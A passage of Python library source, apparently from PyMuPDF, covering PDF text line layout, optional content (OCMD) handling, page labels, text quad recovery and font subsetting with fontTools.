    for i, line in enumerate(textlines):
        if line in ("", " "):  # empty line: keep, never justify
            new_lines.append((line, space_len))
            width = rect.width - tolerance
            no_justify.append((len(new_lines) - 1))
            continue
        if i == 0:  # first line may start right of std_start
            width = rect.x1 - pos.x
        else:
            width = rect.width - tolerance
        if right_to_left:  # reverses Arabic / Hebrew text front to back
            line = writer.clean_rtl(line)
        tl = textlen(line)
        if tl <= width:  # line short enough
            new_lines.append((line, tl))
            no_justify.append((len(new_lines) - 1))
            continue
        # we need to split the line in fitting parts
        words = line.split(" ")  # the words in the line
        # cut in parts any words that are longer than rect width
        words, word_lengths = norm_words(std_width, words)
        n = len(words)
        while True:
            # try the first n words; shrink n until they fit the line
            line0 = " ".join(words[:n])
            wl = sum(word_lengths[:n]) + space_len * (len(word_lengths[:n]) - 1)
            if wl <= width:
                new_lines.append((line0, wl))
                words = words[n:]  # continue with the remaining words
                word_lengths = word_lengths[n:]
                n = len(words)
                line0 = None
            else:
                n -= 1
            if len(words) == 0:
                break
    # -------------------------------------------------------------------------
    # List of lines created. Each item is (text, tl), where 'tl' is the PDF
    # output length (float) and 'text' is the text. Except for justified text,
    # this is output-ready.
    # -------------------------------------------------------------------------
    nlines = len(new_lines)
    if nlines > max_lines:  # too much text: warn, raise, or silently truncate
        msg = "Only fitting %i of %i lines." % (max_lines, nlines)
        if warn == True:
            print("Warning: " + msg)
        elif warn == False:
            raise ValueError(msg)
    start = Point()
    no_justify += [len(new_lines) - 1]  # no justifying of last line
    for i in range(max_lines):
        try:
            line, tl = new_lines.pop(0)
        except IndexError:
            break
        if right_to_left:  # Arabic, Hebrew
            line = "".join(reversed(line))
        if i == 0:  # may have different start for first line
            start = pos
        if align == TEXT_ALIGN_JUSTIFY and i not in no_justify and tl < std_width:
            output_justify(start, line)
            start.x = std_start
            start.y += LINEHEIGHT
            continue
        if i > 0 or pos.x == std_start:  # left, center, right alignments
            start.x += (width - tl) * factor
        append_this(start, line)
        start.x = std_start  # subsequent lines start at the standard position
        start.y += LINEHEIGHT
    return new_lines  # return non-written lines
# ------------------------------------------------------------------------
# Optional Content functions
# ------------------------------------------------------------------------
def get_oc(doc: Document, xref: int) -> int:
    """Return the optional content object xref of an image or form xobject.

    Args:
        doc: the PDF document.
        xref: (int) xref number of an image or form xobject.
    Returns:
        The xref of the /OC entry, or 0 if there is none.
    """
    if doc.is_closed or doc.is_encrypted:
        raise ValueError("document close or encrypted")
    key_type, subtype = doc.xref_get_key(xref, "Subtype")
    if key_type != "name" or subtype not in ("/Image", "/Form"):
        raise ValueError("bad object type at xref %i" % xref)
    oc_type, oc_val = doc.xref_get_key(xref, "OC")
    if oc_type != "xref":  # no optional content attached
        return 0
    return int(oc_val.replace("0 R", ""))
def set_oc(doc: Document, xref: int, oc: int) -> None:
    """Attach optional content object to image or form xobject.

    Args:
        doc: the PDF document.
        xref: (int) xref number of an image or form xobject.
        oc: (int) xref number of an OCG or OCMD; 0 removes any /OC entry.
    """
    if doc.is_closed or doc.is_encrypted:
        raise ValueError("document close or encrypted")
    key_type, key_val = doc.xref_get_key(xref, "Subtype")
    if key_type != "name" or key_val not in ("/Image", "/Form"):
        raise ValueError("bad object type at xref %i" % xref)
    if oc > 0:  # validate that 'oc' really is optional content
        key_type, key_val = doc.xref_get_key(oc, "Type")
        if key_type != "name" or key_val not in ("/OCG", "/OCMD"):
            raise ValueError("bad object type at xref %i" % oc)
    if oc == 0 and "OC" in doc.xref_get_keys(xref):
        doc.xref_set_key(xref, "OC", "null")  # remove existing entry
        return None
    doc.xref_set_key(xref, "OC", "%i 0 R" % oc)
    return None
def set_ocmd(
    doc: Document,
    xref: int = 0,
    ocgs: typing.Union[list, None] = None,
    policy: OptStr = None,
    ve: typing.Union[list, None] = None,
) -> int:
    """Create or update an OCMD object in a PDF document.

    Args:
        xref: (int) 0 for creating a new object, otherwise update existing one.
        ocgs: (list) OCG xref numbers, which shall be subject to 'policy'.
        policy: one of 'AllOn', 'AllOff', 'AnyOn', 'AnyOff' (any casing).
        ve: (list) visibility expression. Use instead of 'ocgs' with 'policy'.
    Returns:
        Xref of the created or updated OCMD.
    Raises:
        ValueError: for bad OCG xrefs, policy names, 've' formats, or when
            'xref' does not point to an existing OCMD.
    """
    all_ocgs = set(doc.get_ocgs().keys())  # all valid OCG xrefs in the doc

    def ve_maker(ve):
        # Recursively convert a nested visibility expression (list/tuple) to
        # PDF array syntax, e.g. ["or", 4, ["not", 5]] -> "[/Or 4 0 R [/Not 5 0 R]]"
        if type(ve) not in (list, tuple) or len(ve) < 2:
            raise ValueError("bad 've' format: %s" % ve)
        if ve[0].lower() not in ("and", "or", "not"):
            raise ValueError("bad operand: %s" % ve[0])
        if ve[0].lower() == "not" and len(ve) != 2:  # 'not' takes one operand
            raise ValueError("bad 've' format: %s" % ve)
        item = "[/%s" % ve[0].title()
        for x in ve[1:]:
            if type(x) is int:  # a direct OCG reference
                if x not in all_ocgs:
                    raise ValueError("bad OCG %i" % x)
                item += " %i 0 R" % x
            else:  # a nested visibility expression
                item += " %s" % ve_maker(x)
        item += "]"
        return item

    text = "<</Type/OCMD"
    if ocgs and type(ocgs) in (list, tuple):  # some OCGs are provided
        s = set(ocgs).difference(all_ocgs)  # contains illegal xrefs
        if s != set():
            msg = "bad OCGs: %s" % s
            raise ValueError(msg)
        text += "/OCGs[" + " ".join(map(lambda x: "%i 0 R" % x, ocgs)) + "]"
    if policy:
        policy = str(policy).lower()
        pols = {
            "anyon": "AnyOn",
            "allon": "AllOn",
            "anyoff": "AnyOff",
            "alloff": "AllOff",
        }
        if policy not in ("anyon", "allon", "anyoff", "alloff"):
            raise ValueError("bad policy: %s" % policy)
        text += "/P/%s" % pols[policy]
    if ve:  # a visibility expression complements / replaces 'ocgs'
        text += "/VE%s" % ve_maker(ve)
    text += ">>"
    # make new object or replace old OCMD (check type first)
    if xref == 0:
        xref = doc.get_new_xref()
    elif "/Type/OCMD" not in doc.xref_object(xref, compressed=True):
        raise ValueError("bad xref or not an OCMD")
    doc.update_object(xref, text)
    return xref
def get_ocmd(doc: Document, xref: int) -> dict:
    """Return the definition of an OCMD (optional content membership dictionary).

    Recognizes PDF dict keys /OCGs (PDF array of OCGs), /P (policy string) and
    /VE (visibility expression, PDF array). Via string manipulation, this
    info is converted to a Python dictionary with keys "xref", "ocgs", "policy"
    and "ve" - ready to recycle as input for 'set_ocmd()'.

    Args:
        doc: the PDF document.
        xref: (int) xref of an existing OCMD object.
    Returns:
        A dict {"xref": int, "ocgs": list or None, "policy": str or None,
        "ve": list or None}.
    Raises:
        ValueError: bad xref, wrong object type, or irregular OCMD syntax.
    """
    if xref not in range(doc.xref_length()):
        raise ValueError("bad xref")
    text = doc.xref_object(xref, compressed=True)
    if "/Type/OCMD" not in text:
        raise ValueError("bad object type")
    textlen = len(text)

    # --- extract the /OCGs array of xref numbers ---
    p0 = text.find("/OCGs[")  # look for /OCGs key
    p1 = text.find("]", p0)
    if p0 < 0 or p1 < 0:  # no OCGs found
        ocgs = None
    else:
        # "n 0 R m 0 R ..." -> [n, m, ...]
        ocgs = text[p0 + 6 : p1].replace("0 R", " ").split()
        ocgs = list(map(int, ocgs))

    # --- extract the /P policy name (always ends with "On" or "Off") ---
    p0 = text.find("/P/")  # look for /P policy key
    if p0 < 0:
        policy = None
    else:
        p1 = text.find("ff", p0)  # try "...Off" endings first
        if p1 < 0:
            p1 = text.find("on", p0)  # then "...On" endings
        if p1 < 0:  # some irregular syntax
            raise ValueError("bad object at xref")
        else:
            policy = text[p0 + 3 : p1 + 2]

    # --- extract the /VE visibility expression array ---
    p0 = text.find("/VE[")  # look for /VE visibility expression key
    if p0 < 0:  # no visibility expression found
        ve = None
    else:
        lp = rp = 0  # find end of /VE by finding last ']'.
        p1 = p0
        while lp < 1 or lp != rp:  # scan until brackets balance
            p1 += 1
            if not p1 < textlen:  # some irregular syntax
                raise ValueError("bad object at xref")
            if text[p1] == "[":
                lp += 1
            if text[p1] == "]":
                rp += 1
        # p1 now positioned at the last "]"
        ve = text[p0 + 3 : p1 + 1]  # the PDF /VE array
        # convert PDF array syntax to a JSON-parsable string
        ve = (
            ve.replace("/And", '"and",')
            .replace("/Not", '"not",')
            .replace("/Or", '"or",')
        )
        ve = ve.replace(" 0 R]", "]").replace(" 0 R", ",").replace("][", "],[")
        try:
            ve = json.loads(ve)
        except:  # show the offending string, then re-raise
            print("bad /VE key: ", ve)
            raise
    return {"xref": xref, "ocgs": ocgs, "policy": policy, "ve": ve}
"""
Handle page labels for PDF documents.
Reading
-------
* compute the label of a page
* find page number(s) having the given label.
Writing
-------
Supports setting (defining) page labels for PDF documents.
A big Thank You goes to WILLIAM CHAPMAN who contributed the idea and
significant parts of the following code during late December 2020
through early January 2021.
"""
def rule_dict(item):
    """Convert a PDF page label rule into a Python dict.

    Args:
        item: a tuple (pno, rule) with the start page number and the rule
            string like <</S/D...>>.
    Returns:
        A dict like
        {'startpage': int, 'prefix': str, 'style': str, 'firstpagenum': int},
        where 'style' is only present if the rule specified one.
    """
    pno, rule = item
    parts = rule[2:-2].split("/")[1:]  # strip "<<", ">>" and the leading "/"
    d = {"startpage": pno, "prefix": "", "firstpagenum": 1}
    idx = 0
    while idx < len(parts):
        token = parts[idx]
        if token == "S":  # style: the value is the following item
            d["style"] = parts[idx + 1]
            idx += 2  # consume the value as well
            continue
        if token.startswith("P"):  # prefix: extract string from parentheses
            d["prefix"] = token[1:].replace("(", "").replace(")", "")
        elif token.startswith("St"):  # start page number specification
            d["firstpagenum"] = int(token[2:])
        idx += 1
    return d
def get_label_pno(pgNo, labels):
    """Return the label for this page number.

    Args:
        pgNo: page number, 0-based.
        labels: result of doc._get_page_labels().
    Returns:
        The label (str) of the page number. Errors return an empty string.
    """
    # the applicable rule is the last one starting at or before this page
    applicable = [x for x in labels if x[0] <= pgNo]
    rule = rule_dict(applicable[-1])
    pagenumber = pgNo - rule["startpage"] + rule["firstpagenum"]
    return construct_label(rule.get("style", ""), rule.get("prefix", ""), pagenumber)
def get_label(page):
    """Return the label for this PDF page.

    Args:
        page: page object.
    Returns:
        The label (str) of the page; an empty string if the document has
        no page label definitions.
    """
    rules = page.parent._get_page_labels()
    if not rules:
        return ""
    rules.sort()  # rules must be in ascending startpage order
    return get_label_pno(page.number, rules)
def get_page_numbers(doc, label, only_one=False):
    """Return a list of page numbers with the given label.

    Args:
        doc: PDF document object (resp. 'self').
        label: (str) label.
        only_one: (bool) stop searching after first hit.
    Returns:
        List of 0-based page numbers having this label.
    """
    hits = []
    if not label:
        return hits
    labels = doc._get_page_labels()
    if labels == []:
        return hits
    for pno in range(doc.page_count):  # compare the label of every page
        if get_label_pno(pno, labels) == label:
            hits.append(pno)
            if only_one:
                break
    return hits
def construct_label(style, prefix, pno) -> str:
    """Construct a label based on style, prefix and page number."""
    if style == "D":  # decimal
        suffix = str(pno)
    elif style == "r":  # lowercase roman
        suffix = integerToRoman(pno).lower()
    elif style == "R":  # uppercase roman
        suffix = integerToRoman(pno).upper()
    elif style == "a":  # lowercase letters
        suffix = integerToLetter(pno).lower()
    elif style == "A":  # uppercase letters
        suffix = integerToLetter(pno).upper()
    else:  # unknown / empty style: prefix only
        suffix = ""
    return prefix + suffix
def integerToLetter(i) -> str:
    """Return the letter sequence string for integer i.

    0-based bijective base-26: 0 -> "A", 25 -> "Z", 26 -> "AA", ...
    """
    letters = string.ascii_uppercase
    ndigits, rest = 1, i
    # determine the number of letters needed, reducing 'rest' accordingly
    while 26**ndigits <= rest:
        rest -= 26**ndigits
        ndigits += 1
    out = []
    for exp in range(ndigits - 1, -1, -1):  # emit digits most-significant first
        digit, rest = divmod(rest, 26**exp)
        out.append(letters[digit])
    return "".join(out)
def integerToRoman(num: int) -> str:
    """Return the Roman numeral representation of a positive integer."""
    values = (1000, 900, 500, 400, 100, 90, 50, 40, 10, 9, 5, 4, 1)
    symbols = ("M", "CM", "D", "CD", "C", "XC", "L", "XL", "X", "IX", "V", "IV", "I")
    pieces = []
    # greedy decomposition: take each value as often as possible
    for value, symbol in zip(values, symbols):
        count, num = divmod(num, value)
        pieces.append(symbol * count)
        if num <= 0:
            break
    return "".join(pieces)
def get_page_labels(doc):
    """Return page label definitions in PDF document.

    Args:
        doc: PDF document (resp. 'self').
    Returns:
        A list of dictionaries with the following format:
        {'startpage': int, 'prefix': str, 'style': str, 'firstpagenum': int}.
    """
    return [rule_dict(rule) for rule in doc._get_page_labels()]
def set_page_labels(doc, labels):
    """Add / replace page label definitions in PDF document.

    Args:
        doc: PDF document (resp. 'self').
        labels: list of label dictionaries like:
            {'startpage': int, 'prefix': str, 'style': str, 'firstpagenum': int},
            as returned by get_page_labels().
    """

    def create_label_str(label):
        """Convert a Python label dict to the corresponding PDF rule string,
        wrapped in "<<", ">>" and preceded by the start page number."""
        rule = "%i<<" % label["startpage"]
        if label.get("prefix", "") != "":
            rule += "/P(%s)" % label["prefix"]
        if label.get("style", "") != "":
            rule += "/S/%s" % label["style"]
        if label.get("firstpagenum", 1) > 1:
            rule += "/St %i" % label["firstpagenum"]
        return rule + ">>"

    # rules must be stored in ascending 'startpage' order
    labels.sort(key=lambda label: label["startpage"])
    # concatenated rules, ready to be enclosed in a PDF 'Nums[...]' array
    doc._set_page_labels("".join(create_label_str(label) for label in labels))
# End of Page Label Code -------------------------------------------------
def has_links(doc: Document) -> bool:
    """Check whether any page of the PDF contains a link annotation."""
    if doc.is_closed:
        raise ValueError("document closed")
    if not doc.is_pdf:
        raise ValueError("is no PDF")
    # Scan annotation xrefs of all pages; item[1] is the annotation type.
    return any(
        item[1] == PDF_ANNOT_LINK
        for pno in range(doc.page_count)
        for item in doc.page_annot_xrefs(pno)
    )
def has_annots(doc: Document) -> bool:
    """Check whether any page has an annotation (other than links / widgets)."""
    if doc.is_closed:
        raise ValueError("document closed")
    if not doc.is_pdf:
        raise ValueError("is no PDF")
    # Links and form fields do not count as annotations here.
    return any(
        item[1] not in (PDF_ANNOT_LINK, PDF_ANNOT_WIDGET)
        for pno in range(doc.page_count)
        for item in doc.page_annot_xrefs(pno)
    )
# -------------------------------------------------------------------
# Functions to recover the quad contained in a text extraction bbox
# -------------------------------------------------------------------
def recover_bbox_quad(line_dir: tuple, span: dict, bbox: tuple) -> Quad:
    """Compute the quad located inside the bbox.

    The bbox may be any of the resp. tuples occurring inside the given span.

    Args:
        line_dir: (tuple) 'line["dir"]' of the owning line or None.
        span: (dict) the span. May be from get_texttrace() method.
        bbox: (tuple) the bbox of the span or any of its characters.

    Returns:
        The quad which is wrapped by the bbox.
    """
    if line_dir == None:  # spans from get_texttrace() carry their own "dir"
        line_dir = span["dir"]
    cos, sin = line_dir  # writing direction unit vector components
    bbox = Rect(bbox)  # make it a rect
    if TOOLS.set_small_glyph_heights():  # ==> just fontsize as height
        d = 1
    else:
        d = span["ascender"] - span["descender"]
    height = d * span["size"]  # the quad's rectangle height
    # The following are distances from the bbox corners, at which we find the
    # respective quad points. The computation depends on in which quadrant
    # the text writing angle is located.
    hs = height * sin
    hc = height * cos
    if hc >= 0 and hs <= 0:  # quadrant 1
        ul = bbox.bl - (0, hc)
        ur = bbox.tr + (hs, 0)
        ll = bbox.bl - (hs, 0)
        lr = bbox.tr + (0, hc)
    elif hc <= 0 and hs <= 0:  # quadrant 2
        ul = bbox.br + (hs, 0)
        ur = bbox.tl - (0, hc)
        ll = bbox.br + (0, hc)
        lr = bbox.tl - (hs, 0)
    elif hc <= 0 and hs >= 0:  # quadrant 3
        ul = bbox.tr - (0, hc)
        ur = bbox.bl + (hs, 0)
        ll = bbox.tr - (hs, 0)
        lr = bbox.bl + (0, hc)
    else:  # quadrant 4
        ul = bbox.tl + (hs, 0)
        ur = bbox.br - (0, hc)
        ll = bbox.tl + (0, hc)
        lr = bbox.br - (hs, 0)
    return Quad(ul, ur, ll, lr)
def recover_quad(line_dir: tuple, span: dict) -> Quad:
    """Recover the quadrilateral of a text span.

    Args:
        line_dir: (tuple) 'line["dir"]' of the owning line.
        span: the span.

    Returns:
        The quadrilateral enveloping the span's text.
    """
    # Validate arguments before delegating to the generic bbox-based routine.
    dir_ok = type(line_dir) is tuple and len(line_dir) == 2
    if not dir_ok:
        raise ValueError("bad line dir argument")
    if type(span) is not dict:
        raise ValueError("bad span argument")
    return recover_bbox_quad(line_dir, span, span["bbox"])
def recover_line_quad(line: dict, spans: list = None) -> Quad:
    """Calculate the line quad for 'dict' / 'rawdict' text extractions.

    The lower quad points are those of the first, resp. last span quad.
    The upper points are determined by the maximum span quad height.
    From this, compute a rect with bottom-left in (0, 0), convert this to a
    quad and rotate and shift back to cover the text of the spans.

    Args:
        line: (dict) the line dictionary from text extraction.
        spans: (list, optional) sub-list of spans to consider.

    Returns:
        Quad covering selected spans.
    """
    if spans == None:  # no sub-selection
        spans = line["spans"]  # all spans
    if len(spans) == 0:
        raise ValueError("bad span list")
    line_dir = line["dir"]  # text direction
    cos, sin = line_dir
    q0 = recover_quad(line_dir, spans[0])  # quad of first span
    if len(spans) > 1:  # get quad of last span
        q1 = recover_quad(line_dir, spans[-1])
    else:
        q1 = q0  # last = first
    line_ll = q0.ll  # lower-left of line quad
    line_lr = q1.lr  # lower-right of line quad
    mat0 = planish_line(line_ll, line_lr)
    # map base line to x-axis such that line_ll goes to (0, 0)
    x_lr = line_lr * mat0
    small = TOOLS.set_small_glyph_heights()  # small glyph heights?
    # height of the line quad = tallest span (fontsize only in "small" mode)
    h = max(
        [s["size"] * (1 if small else (s["ascender"] - s["descender"])) for s in spans]
    )
    line_rect = Rect(0, -h, x_lr.x, 0)  # line rectangle
    line_quad = line_rect.quad  # make it a quad and:
    line_quad *= ~mat0  # rotate back and shift into final position
    return line_quad
def recover_span_quad(line_dir: tuple, span: dict, chars: list = None) -> Quad:
    """Calculate the span quad for 'dict' / 'rawdict' text extractions.

    Notes:
        There are two execution paths:
        1. For the full span quad, the result of 'recover_quad' is returned.
        2. For the quad of a sub-list of characters, the char quads are
           computed and joined. This is only supported for the "rawdict"
           extraction option.

    Args:
        line_dir: (tuple) 'line["dir"]' of the owning line.
        span: (dict) the span.
        chars: (list, optional) sub-list of characters to consider.

    Returns:
        Quad covering selected characters.
    """
    if line_dir == None:  # must be a span from get_texttrace()
        line_dir = span["dir"]
    if chars == None:  # no sub-selection
        return recover_quad(line_dir, span)
    if not "chars" in span.keys():
        raise ValueError("need 'rawdict' option to sub-select chars")
    q0 = recover_char_quad(line_dir, span, chars[0])  # quad of first char
    if len(chars) > 1:  # get quad of last char
        q1 = recover_char_quad(line_dir, span, chars[-1])
    else:
        q1 = q0  # last = first
    span_ll = q0.ll  # lower-left of span quad
    span_lr = q1.lr  # lower-right of span quad
    mat0 = planish_line(span_ll, span_lr)
    # map base line to x-axis such that span_ll goes to (0, 0)
    x_lr = span_lr * mat0
    small = TOOLS.set_small_glyph_heights()  # small glyph heights?
    h = span["size"] * (1 if small else (span["ascender"] - span["descender"]))
    span_rect = Rect(0, -h, x_lr.x, 0)  # line rectangle
    span_quad = span_rect.quad  # make it a quad and:
    span_quad *= ~mat0  # rotate back and shift back
    return span_quad
def recover_char_quad(line_dir: tuple, span: dict, char: dict) -> Quad:
    """Recover the quadrilateral of a text character.

    This requires the "rawdict" option of text extraction.

    Args:
        line_dir: (tuple) 'line["dir"]' of the span's line, or None for
            spans coming from get_texttrace().
        span: (dict) the span dict.
        char: (dict) the character dict ("rawdict") or a character tuple
            (get_texttrace(), where item 3 is the bbox).

    Returns:
        The quadrilateral enveloping the character.

    Raises:
        ValueError: on a malformed line_dir, span or char argument.
    """
    if line_dir is None:  # span from get_texttrace() carries its own "dir"
        line_dir = span["dir"]
    if type(line_dir) is not tuple or len(line_dir) != 2:
        raise ValueError("bad line dir argument")
    if type(span) is not dict:
        raise ValueError("bad span argument")
    if type(char) is dict:  # "rawdict" character
        bbox = Rect(char["bbox"])
    elif type(char) is tuple:  # get_texttrace() character
        bbox = Rect(char[3])
    else:
        # bug fix: previously raised the misleading "bad span argument"
        raise ValueError("bad char argument")
    return recover_bbox_quad(line_dir, span, bbox)
# -------------------------------------------------------------------
# Building font subsets using fontTools
# -------------------------------------------------------------------
def subset_fonts(doc: Document, verbose: bool = False) -> int:
    """Build font subsets of a PDF. Requires package 'fontTools'.

    Eligible fonts are potentially replaced by smaller versions. Page text is
    NOT rewritten and thus should retain properties like being hidden or
    controlled by optional content.

    Args:
        doc: PDF document (resp. 'self').
        verbose: (bool) print diagnostic messages if True.

    Returns:
        Number of bytes saved: old total font size minus new total font size
        (0 if no font could be subsetted).
    """
    # Font binaries: - "buffer" -> (names, xrefs, (unicodes, glyphs))
    # An embedded font is uniquely defined by its fontbuffer only. It may have
    # multiple names and xrefs.
    # Once the sets of used unicodes and glyphs are known, we compute a
    # smaller version of the buffer user package fontTools.
    font_buffers = {}
    def get_old_widths(xref):
        """Retrieve old font '/W' and '/DW' values from the descendant font."""
        df = doc.xref_get_key(xref, "DescendantFonts")
        if df[0] != "array":  # only handle xref specifications
            return None, None
        df_xref = int(df[1][1:-1].replace("0 R", ""))
        widths = doc.xref_get_key(df_xref, "W")
        if widths[0] != "array":  # no widths key found
            widths = None
        else:
            widths = widths[1]
        dwidths = doc.xref_get_key(df_xref, "DW")
        if dwidths[0] != "int":
            dwidths = None
        else:
            dwidths = dwidths[1]
        return widths, dwidths
    def set_old_widths(xref, widths, dwidths):
        """Restore the old '/W' and '/DW' in subsetted font.

        If either parameter is None or evaluates to False, the corresponding
        dictionary key will be set to null.
        """
        df = doc.xref_get_key(xref, "DescendantFonts")
        if df[0] != "array":  # only handle xref specs
            return None
        df_xref = int(df[1][1:-1].replace("0 R", ""))
        if (type(widths) is not str or not widths) and doc.xref_get_key(df_xref, "W")[
            0
        ] != "null":
            doc.xref_set_key(df_xref, "W", "null")
        else:
            doc.xref_set_key(df_xref, "W", widths)
        if (type(dwidths) is not str or not dwidths) and doc.xref_get_key(
            df_xref, "DW"
        )[0] != "null":
            doc.xref_set_key(df_xref, "DW", "null")
        else:
            doc.xref_set_key(df_xref, "DW", dwidths)
        return None
    def set_subset_fontname(new_xref):
        """Generate a name prefix to tag a font as subset.

        We use a random generator to select 6 upper case ASCII characters.
        The prefixed name must be put in the font xref as the "/BaseFont" value
        and in the FontDescriptor object as the '/FontName' value.
        """
        # The following generates a prefix like 'ABCDEF+'
        prefix = "".join(random.choices(tuple(string.ascii_uppercase), k=6)) + "+"
        font_str = doc.xref_object(new_xref, compressed=True)
        font_str = font_str.replace("/BaseFont/", "/BaseFont/" + prefix)
        # Type0 fonts: also prefix the '/FontName' in the FontDescriptor.
        df = doc.xref_get_key(new_xref, "DescendantFonts")
        if df[0] == "array":
            df_xref = int(df[1][1:-1].replace("0 R", ""))
            fd = doc.xref_get_key(df_xref, "FontDescriptor")
            if fd[0] == "xref":
                fd_xref = int(fd[1].replace("0 R", ""))
                fd_str = doc.xref_object(fd_xref, compressed=True)
                fd_str = fd_str.replace("/FontName/", "/FontName/" + prefix)
                doc.update_object(fd_xref, fd_str)
        doc.update_object(new_xref, font_str)
        return None
    def build_subset(buffer, unc_set, gid_set):
        """Build font subset using fontTools.

        Args:
            buffer: (bytes) the font given as a binary buffer.
            unc_set: (set) required unicodes.
            gid_set: (set) required glyph ids.

        Returns:
            Either None if subsetting is unsuccessful or the subset font buffer.
        """
        try:
            import fontTools.subset as fts
        except ImportError:
            print("This method requires fontTools to be installed.")
            raise
        # fontTools' subsetter works on files, so exchange data via temp files.
        tmp_dir = tempfile.gettempdir()
        oldfont_path = f"{tmp_dir}/oldfont.ttf"
        newfont_path = f"{tmp_dir}/newfont.ttf"
        uncfile_path = f"{tmp_dir}/uncfile.txt"
        args = [
            oldfont_path,
            "--retain-gids",
            f"--output-file={newfont_path}",
            "--layout-features='*'",
            "--passthrough-tables",
            "--ignore-missing-glyphs",
            "--ignore-missing-unicodes",
            "--symbol-cmap",
        ]
        unc_file = open(
            f"{tmp_dir}/uncfile.txt", "w"
        )  # store glyph ids or unicodes as file
        if 0xFFFD in unc_set:  # error unicode exists -> use glyphs
            args.append(f"--gids-file={uncfile_path}")
            # NOTE(review): 189 resp. 255 below are always added to the
            # subset - presumably to guarantee a non-empty set; confirm.
            gid_set.add(189)
            unc_list = list(gid_set)
            for unc in unc_list:
                unc_file.write("%i\n" % unc)
        else:
            args.append(f"--unicodes-file={uncfile_path}")
            unc_set.add(255)
            unc_list = list(unc_set)
            for unc in unc_list:
                unc_file.write("%04x\n" % unc)
        unc_file.close()
        fontfile = open(oldfont_path, "wb")  # store fontbuffer as a file
        fontfile.write(buffer)
        fontfile.close()
        try:
            os.remove(newfont_path)  # remove old file
        except:
            pass
        try:  # invoke fontTools subsetter
            fts.main(args)
            font = Font(fontfile=newfont_path)
            new_buffer = font.buffer
            # subset that maps no codepoints at all is useless
            if len(font.valid_codepoints()) == 0:
                new_buffer = None
        except:
            new_buffer = None
        # best-effort cleanup of the temp files - failures are ignored
        try:
            os.remove(uncfile_path)
        except:
            pass
        try:
            os.remove(oldfont_path)
        except:
            pass
        try:
            os.remove(newfont_path)
        except:
            pass
        return new_buffer
    def repl_fontnames(doc):
        """Populate 'font_buffers'.

        For each font candidate, store its xref and the list of names
        by which PDF text may refer to it (there may be multiple).
        """
        def norm_name(name):
            """Recreate font name that contains PDF hex codes.

            E.g. #20 -> space, chr(32)
            """
            while "#" in name:
                p = name.find("#")
                c = int(name[p + 1 : p + 3], 16)
                name = name.replace(name[p : p + 3], chr(c))
            return name
        def get_fontnames(doc, item):
            """Return a list of fontnames for an item of page.get_fonts().

            There may be multiple names e.g. for Type0 fonts.
            """
            fontname = item[3]
            names = [fontname]
            fontname = doc.xref_get_key(item[0], "BaseFont")[1][1:]
            fontname = norm_name(fontname)
            if fontname not in names:
                names.append(fontname)
            descendents = doc.xref_get_key(item[0], "DescendantFonts")
            if descendents[0] != "array":
                return names
            # extract the '/BaseFont' of the descendant font as well
            descendents = descendents[1][1:-1]
            if descendents.endswith(" 0 R"):
                xref = int(descendents[:-4])
                descendents = doc.xref_object(xref, compressed=True)
            p1 = descendents.find("/BaseFont")
            if p1 >= 0:
                p2 = descendents.find("/", p1 + 1)
                p1 = min(descendents.find("/", p2 + 1), descendents.find(">>", p2 + 1))
                fontname = descendents[p2 + 1 : p1]
                fontname = norm_name(fontname)
                if fontname not in names:
                    names.append(fontname)
            return names
        for i in range(doc.page_count):
            for f in doc.get_page_fonts(i, full=True):
                font_xref = f[0]  # font xref
                font_ext = f[1]  # font file extension
                basename = f[3]  # font basename
                if font_ext not in (  # skip if not supported by fontTools
                    "otf",
                    "ttf",
                    "woff",
                    "woff2",
                ):
                    continue
                # skip fonts which already are subsets
                if len(basename) > 6 and basename[6] == "+":
                    continue
                extr = doc.extract_font(font_xref)
                fontbuffer = extr[-1]
                names = get_fontnames(doc, f)
                # merge into any existing entry for the same binary buffer
                name_set, xref_set, subsets = font_buffers.get(
                    fontbuffer, (set(), set(), (set(), set()))
                )
                xref_set.add(font_xref)
                for name in names:
                    name_set.add(name)
                font = Font(fontbuffer=fontbuffer)
                name_set.add(font.name)
                del font
                font_buffers[fontbuffer] = (name_set, xref_set, subsets)
        return None
    def find_buffer_by_name(name):
        # Reverse lookup: which font buffer owns the given font name?
        for buffer in font_buffers.keys():
            name_set, _, _ = font_buffers[buffer]
            if name in name_set:
                return buffer
        return None
    # -----------------
    # main function
    # -----------------
    repl_fontnames(doc)  # populate font information
    if not font_buffers:  # nothing found to do
        if verbose:
            print("No fonts to subset.")
        return 0
    old_fontsize = 0
    new_fontsize = 0
    for fontbuffer in font_buffers.keys():
        old_fontsize += len(fontbuffer)
    # Scan page text for usage of subsettable fonts
    for page in doc:
        # go through the text and extend set of used glyphs by font
        # we use a modified MuPDF trace device, which delivers us glyph ids.
        for span in page.get_texttrace():
            if type(span) is not dict:  # skip useless information
                continue
            fontname = span["font"][:33]  # fontname for the span
            buffer = find_buffer_by_name(fontname)
            if buffer is None:
                continue
            name_set, xref_set, (set_ucs, set_gid) = font_buffers[buffer]
            for c in span["chars"]:
                set_ucs.add(c[0])  # unicode
                set_gid.add(c[1])  # glyph id
            font_buffers[buffer] = (name_set, xref_set, (set_ucs, set_gid))
    # build the font subsets
    for old_buffer in font_buffers.keys():
        name_set, xref_set, subsets = font_buffers[old_buffer]
        new_buffer = build_subset(old_buffer, subsets[0], subsets[1])
        fontname = list(name_set)[0]
        if new_buffer == None or len(new_buffer) >= len(old_buffer):
            # subset was not created or did not get smaller
            if verbose:
                print(f"Cannot subset '{fontname}'.")
            continue
        if verbose:
            print(f"Built subset of font '{fontname}'.")
        val = doc._insert_font(fontbuffer=new_buffer)  # store subset font in PDF
        new_xref = val[0]  # get its xref
        set_subset_fontname(new_xref)  # tag fontname as subset font
        font_str = doc.xref_object(  # get its object definition
            new_xref,
            compressed=True,
        )
        # walk through the original font xrefs and replace each by the subset def
        for font_xref in xref_set:
            # we need the original '/W' and '/DW' width values
            width_table, def_width = get_old_widths(font_xref)
            # ... and replace original font definition at xref with it
            doc.update_object(font_xref, font_str)
            # now copy over old '/W' and '/DW' values
            if width_table or def_width:
                set_old_widths(font_xref, width_table, def_width)
        # 'new_xref' remains unused in the PDF and must be removed
        # by garbage collection.
        new_fontsize += len(new_buffer)
    return old_fontsize - new_fontsize
# -------------------------------------------------------------------
# Copy XREF object to another XREF
# -------------------------------------------------------------------
def xref_copy(doc: Document, source: int, target: int, *, keep: list = None) -> None:
    """Copy a PDF dictionary object to another one given their xref numbers.

    Args:
        doc: PDF document object
        source: source xref number
        target: target xref number, the xref must already exist
        keep: an optional list of 1st level keys in target that should not be
            removed before copying.

    Notes:
        This works similar to the copy() method of dictionaries in Python. The
        source may be a stream object.
    """
